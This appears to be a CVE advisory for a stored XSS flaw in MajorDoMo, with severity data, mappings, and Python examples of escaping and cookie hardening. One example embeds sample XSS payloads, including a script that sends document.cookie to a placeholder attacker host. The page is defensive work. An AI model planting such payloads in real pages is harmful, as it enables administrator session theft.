Cyber Resilience

CVE-2026-27177

Severity: Medium · Public PoC referenced

Published: 18 February 2026
Modified: 20 February 2026
KEV Added: not listed
Patch: available (GitHub pull request #1177, see Deeper analysis)
CVSS v4.0 base score: 5.3 (Medium)
CVSS v4.0 vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0005 (14.9th percentile)
Risk Priority: 11 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-27177 is a medium-severity Cross-site Scripting (CWE-79) vulnerability in Mjdm Majordomo. Its CVSS base score is 5.3 (Medium).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks at the 14.9th EPSS percentile by exploit likelihood (below the median), is not currently listed in the CISA KEV catalog, and has a referenced public proof-of-concept.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-27177 is a stored cross-site scripting (XSS) vulnerability in MajorDoMo (also known as Major Domestic Module), an open-source home automation and IoT management platform. The issue lies in the /objects/?op=set endpoint, which is intentionally unauthenticated for IoT device integration and accepts user-supplied property values without sanitization, storing them raw in the database. When an administrator opens the property editor in the admin panel, those values are rendered unescaped in a paragraph tag (SOURCE field) and a textarea element (VALUE field), so the payload runs on page load with no click required; the CVSS v4 vector records this as passive user interaction (UI:P). Alongside the 5.3 v4 score above, the vulnerability carries a 7.2 CVSS v3.1 score (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) and maps to CWE-79.

Any unauthenticated attacker with network access can exploit this vulnerability by enumerating properties through the unauthenticated /api.php/data/ endpoint and injecting JavaScript into any property via /objects/?op=set. When an administrator views the affected property in the editor, the script runs in the admin's browser context and can read sensitive data from the page. Because the session cookie lacks the HttpOnly flag, the script can also read it through document.cookie and exfiltrate it, handing the attacker the admin session and with it administrative control of the MajorDoMo instance.

Advisories from VulnCheck and Chocapikk detail the vulnerability and proof-of-concept exploitation, while a patch addressing the sanitization and HttpOnly issues is available in GitHub pull request #1177 for the sergejey/majordomo repository.
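The sink side of the flaw above, reduced to a runnable example. This is added illustration, not MajorDoMo's code, the PoC, or the PR #1177 patch: the two render functions are a hypothetical template standing in for the property editor (a <p> for SOURCE and a <textarea> for VALUE), the payload strings are constructed, and the checker walks the rendered HTML with Python's tokenizer to list anything that would execute. It goes slightly beyond the page by showing why the textarea context needs the same treatment as the paragraph: a stored VALUE can contain a literal </textarea>, which closes the element early unless the angle bracket is encoded.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: strings an unauthenticated client could submit as
# a property's SOURCE and VALUE through the endpoint the advisory describes.
# The payload text is illustrative, not taken from the advisory or the PoC.
POISONED_SOURCE = '<img src=x onerror="alert(document.cookie)">'
POISONED_VALUE = ('</textarea><script>'
                  'new Image().src="https://attacker.invalid/?c="+document.cookie'
                  '</script>')


def render_editor_vulnerable(source: str, value: str) -> str:
    """Hypothetical template standing in for the flawed editor page: the
    stored strings are interpolated verbatim into a <p> and a <textarea>."""
    return (f'<p class="source">{source}</p>\n'
            f'<textarea name="value">{value}</textarea>')


def render_editor_fixed(source: str, value: str) -> str:
    """Same template with output filtering applied at render time.
    html.escape encodes < > & and both quote characters; encoding '<' is
    what stops a '</textarea>' inside VALUE from closing the element early,
    so one HTML-body encoder is correct for both fields."""
    return (f'<p class="source">{html.escape(source, quote=True)}</p>\n'
            f'<textarea name="value">{html.escape(value, quote=True)}</textarea>')


class ActiveContentFinder(HTMLParser):
    """Walks rendered HTML the way a browser tokenizer would and records the
    constructs that execute: <script> elements and on* event-handler attributes.
    Escaped text never reaches handle_starttag, so '&lt;script&gt;' is inert."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"{tag}@{name} handler")


def active_content(rendered: str) -> list[str]:
    """Executable constructs found in a rendered page; [] means it is inert."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    before = render_editor_vulnerable(POISONED_SOURCE, POISONED_VALUE)
    after = render_editor_fixed(POISONED_SOURCE, POISONED_VALUE)
    print("vulnerable:", active_content(before))
    print("fixed:     ", active_content(after))
```

The checker doubles as a regression test for the rendering fix: it reports the onerror handler and the script element in the vulnerable output and nothing in the escaped output. In PHP, the project's own language, the equivalent encoder is htmlspecialchars($value, ENT_QUOTES, 'UTF-8'). Escaping at the sink is the control that actually closes this class of bug; input validation at /objects/?op=set (the SI-10 control listed later) helps but is fragile on its own, because IoT property values are free-form strings and every new place that renders them is a new sink.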

Vulnerability details

MajorDoMo (aka Major Domestic Module) contains a stored cross-site scripting (XSS) vulnerability via the /objects/?op=set endpoint, which is intentionally unauthenticated for IoT device integration. User-supplied property values are stored raw in the database without sanitization. When an administrator views the property editor in the admin panel, the stored values are rendered without escaping in both a paragraph tag (SOURCE field) and a textarea element (VALUE field). The XSS fires on page load without requiring any click from the admin. Additionally, the session cookie lacks the HttpOnly flag, enabling session hijack via document.cookie exfiltration. An attacker can enumerate properties via the unauthenticated /api.php/data/ endpoint and poison any property with malicious JavaScript.

CWE(s)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1190 Exploit Public-Facing Application (tactic: Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1185 Browser Session Hijacking (tactic: Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Why these techniques?

A stored XSS reachable through an unauthenticated public endpoint is the initial-access step T1190 covers, and the resulting script execution in the administrator's browser is what T1185 describes (browser session hijacking via cookie theft in the admin context). The cookie theft itself also matches T1539 (Steal Web Session Cookie, Credential Access), which the mapping above does not list.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-27178 (same product: Mjdm Majordomo)
CVE-2026-27174 (same product: Mjdm Majordomo)
CVE-2026-27181 (same product: Mjdm Majordomo)
CVE-2026-27180 (same product: Mjdm Majordomo)
CVE-2026-27175 (same product: Mjdm Majordomo)
CVE-2026-27179 (same product: Mjdm Majordomo)
CVE-2026-1843 (shared CWE-79)
CVE-2026-42678 (shared CWE-79)
CVE-2023-49186 (shared CWE-79)
CVE-2025-22586 (shared CWE-79)

Affected Assets

Vendor: mjdm
Product: majordomo
Versions: all versions (as listed; a fix is available in GitHub pull request #1177, see Deeper analysis)

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

SI-10 Information Input Validation (prevent)
Requires validation and sanitization of all input received at the unauthenticated /objects/?op=set endpoint before values are stored in the database.

SI-15 Information Output Filtering (prevent)
Mandates output filtering/escaping of stored property values when rendered in the admin panel's SOURCE paragraph and VALUE textarea, directly blocking XSS execution.

Secure configuration of session cookies (prevent)
Enforces secure configuration settings such as the HttpOnly flag on session cookies, preventing exfiltration via document.cookie after XSS fires. HttpOnly limits what a successful injection can steal; it does not stop the script from running with the administrator's session.
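The cookie-flag control above, as an added worked example (not MajorDoMo's code or the PR #1177 fix): a small Set-Cookie parser, an audit that flags a session cookie the way the advisory describes it, a function that lists which cookies an injected script could read through document.cookie, and a rewrite that adds the missing attributes. The header strings and the cookie name PHPSESSID are constructed assumptions. The audit goes beyond the page by also checking Secure and SameSite, which the advisory does not mention.

```python
# Constructed sample Set-Cookie headers. The first list mirrors the weak session
# cookie the advisory describes (no HttpOnly); the second is the hardened form.
# The cookie name PHPSESSID is an assumption, not taken from the advisory.
WEAK_HEADERS = [
    "PHPSESSID=0123456789abcdef; Path=/",
    "theme=dark; Path=/",
]
HARDENED_HEADERS = [
    "PHPSESSID=0123456789abcdef; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/",
]

# Canonical spelling used when a header is rewritten.
CANONICAL = {"path": "Path", "domain": "Domain", "expires": "Expires",
             "max-age": "Max-Age", "secure": "Secure", "httponly": "HttpOnly",
             "samesite": "SameSite"}


def parse_set_cookie(header: str) -> tuple[str, str, dict]:
    """Split one Set-Cookie header into (name, value, attributes).
    Flag attributes such as HttpOnly and Secure map to True; attribute
    names are lower-cased because they are case-insensitive."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs: dict = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_cookie(header: str) -> list[str]:
    """Findings for a session cookie header; [] means it passes."""
    _, _, attrs = parse_set_cookie(header)
    issues = []
    if "httponly" not in attrs:
        issues.append("missing HttpOnly")
    if "secure" not in attrs:
        issues.append("missing Secure")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        issues.append("SameSite not Lax/Strict")
    return issues


def readable_by_script(headers: list[str]) -> list[str]:
    """Names of cookies an injected script could read via document.cookie.
    Browsers withhold HttpOnly cookies from script; every other cookie for
    the origin is exposed, which is what the stored XSS above abuses."""
    return [name for name, _, attrs in map(parse_set_cookie, headers)
            if "httponly" not in attrs]


def harden(header: str) -> str:
    """Rewrite a Set-Cookie header so HttpOnly, Secure and SameSite=Lax are set,
    leaving attributes that are already present untouched."""
    name, value, attrs = parse_set_cookie(header)
    attrs.setdefault("httponly", True)
    attrs.setdefault("secure", True)
    attrs.setdefault("samesite", "Lax")
    rendered = [f"{name}={value}"]
    for key, val in attrs.items():
        label = CANONICAL.get(key, key)
        rendered.append(label if val is True else f"{label}={val}")
    return "; ".join(rendered)


if __name__ == "__main__":
    for header in WEAK_HEADERS:
        print(header, "->", audit_cookie(header) or "ok")
    print("readable via document.cookie (weak):", readable_by_script(WEAK_HEADERS))
    print("readable via document.cookie (hardened):", readable_by_script(HARDENED_HEADERS))
    print("rewritten:", harden(WEAK_HEADERS[0]))
```

Run against a live instance, the audit would be fed the Set-Cookie headers of the login response; here it runs on the constructed headers. In PHP the durable fix is configuration rather than a rewrite: session.cookie_httponly = 1 (and session.cookie_secure = 1) in php.ini, or session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']) before session_start(). Keep the scope of the control in mind: once the session cookie is HttpOnly, the injected script can no longer read it, but it still executes as the administrator and can send authenticated requests from that browser, so the escaping fix remains the primary control.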
